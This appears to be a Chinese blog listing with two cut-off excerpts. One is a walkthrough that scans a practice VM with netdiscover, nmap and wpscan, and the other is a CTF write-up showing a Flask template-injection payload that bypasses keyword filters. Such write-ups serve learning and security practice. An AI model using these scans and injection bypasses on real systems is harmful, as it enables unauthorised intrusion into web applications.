靶机准备 导入虚拟机,并将网络模式设置为NAT 扫描ip netdiscover -r 192.168.164.0/24 渗透测试 扫描端口 nmap -sS -sV -T5 -A -p- 192.168.164.191 其中有3个端口开放了http服务 依次访问80.8081.9001 其中80是w3.css 5000端口是WordPress 8081端口是Joomla 9001端口是drupal cms版本扫描 1.wpscan --url http://192.168.164.191:50…

华为杯 × 签到杯√ 论比赛过程来说没什么很大收获 但看师傅们的wp感触很多 赛后复现慢慢学吧 Web babyflask flask ssti模板注入: payload{{key}}发现[]以及类似os,__import__等敏感关键词都被过滤. 用__getitem__(2)来表示[number],__getattribute__('__a'+'bc__')来表示[__abc__] 最终payload{{''.__class__.__mro__.__getitem__(2).__subcla…